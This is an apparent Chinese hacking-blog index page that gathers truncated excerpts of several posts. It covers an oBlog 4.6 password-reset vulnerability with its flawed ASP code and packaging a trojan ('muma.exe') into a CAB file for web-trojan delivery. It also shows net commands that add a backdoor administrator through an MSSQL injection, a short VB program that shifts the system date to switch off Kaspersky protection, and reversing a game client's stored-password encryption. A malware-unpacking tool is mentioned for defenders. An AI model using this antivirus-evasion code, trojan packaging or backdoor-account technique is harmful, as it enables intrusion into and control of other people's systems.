影响版本:4.6商业版
发现人:雕牌
来源:http://52cmd.cn
漏洞描述:
通过构造特定的语句,可以更改任何用户的密码,包括管理员,严重级漏洞。
漏洞文件:AjaxServer.asp
变量:log_files
语句:log_files=Replace(log_files," ","")
If Left(log_files,1)="," Then log_files=Right(log_files,Len(log_files)-1)
rs("logpics") = log_files
'附加文件处理
If log_files <>"" Then
oblog.Execute "Update oblog_upfile Set logid=" 阅读全文 »
来源:7jdg's blog
百度网马的时想要用到,CAB文件封装器CABARC
Usage: CABARC [options] command cabfile [@list] [files] [dest_dir]
Commands:
L List contents of cabinet (e.g. cabarc l test.cab)
N Create new cabinet (e.g. cabarc n test.cab *.c app.mak *.h)
X Extract file(s) from cabinet (e.g. cabarc x test.cab foo*.c)
例如:cabarc n calc.cab muma.exe
阅读全文 »
鬼仔:其实从最初的版本我就看到了,但是当时看起来还很弱,能脱的壳比较少,但是发现最近更新了,现在最新的版本是1.2,能脱57种壳,发上来。
数据安全实验室(DSWLAB) 出品
本工具完全基于虚拟机技术,对各种已知未知壳进行脱壳处理,适合病毒分析中对加壳的木马样本进行脱壳处理。由于所有代码均运行在虚拟机中,不会对系统造成任何危害。
欢迎使用本程序并反馈问题致[email protected]
如果你在使用中遇到问题,请提交未脱壳的程序给我们,能提供该程序的加壳工具更好,提交方法将程序发送到[email protected]。
图:
阅读全文 »
鬼仔注:老文章了,以前没发过。
来源:hackest[H.S.T]
大家都知道在windows下添加用户可以在CMD下用net命令来实现
格式为:net user username password /add
意思为添加一个用户名为username密码为password的用户
如果要添加进管理员组还可以用如下命令来实现
net localgroup administrators username /add
这样就把用户名为username的用户加进了管理员组
但是如果不用net.exe和net1.exe是不是就无法添加系统用户了呢?
答案是否定的!
假设我们现在手上有一个SA权限的MSSQL注入点
3389开放并允许连接登录
可以通过注入工具执行任意命令
但是管理员把net.exe和net1.exe改名或者直接删除掉了
阅读全文 »
鬼仔注:还是利用修改时间达到使卡巴失效的目的。不过据说卡巴下个版本要修正这个问题了。
作者:雪狐
Private Sub Form_Load()
Date = Date - 5000
End Sub
Private Sub Timer1_Timer()
Date = Date + 5000
End
End Sub
很简单的几句话,timer设置15秒即可!
运行程序后日期由正确的日期减去5000天,然后经过15秒后又加上5000天!恢复了原来的时间!
卡巴在这个15秒内停止保护!!
呵呵
很爽了,比网上流行的bat写的好的没法说了!
Tags: 卡巴斯基//作者:姜堰市合作银行-姚佩云 www.jynx.com.cn [email protected]
//首发大富翁论坛(www.delphibbs.com)blog,转载请尊重作者成果,保留此信息
闲来无事,每天上联众,联众的密码经过加密后保存在本地注册表里,看看是怎么加密的。下了个ollydbg,一路跟踪,发现算法极其简单,给出Delphi版本的解密算法(加密部分有兴趣的一起来讨论)。算法比较粗糟,谁帮优化一下:)
阅读全文 »
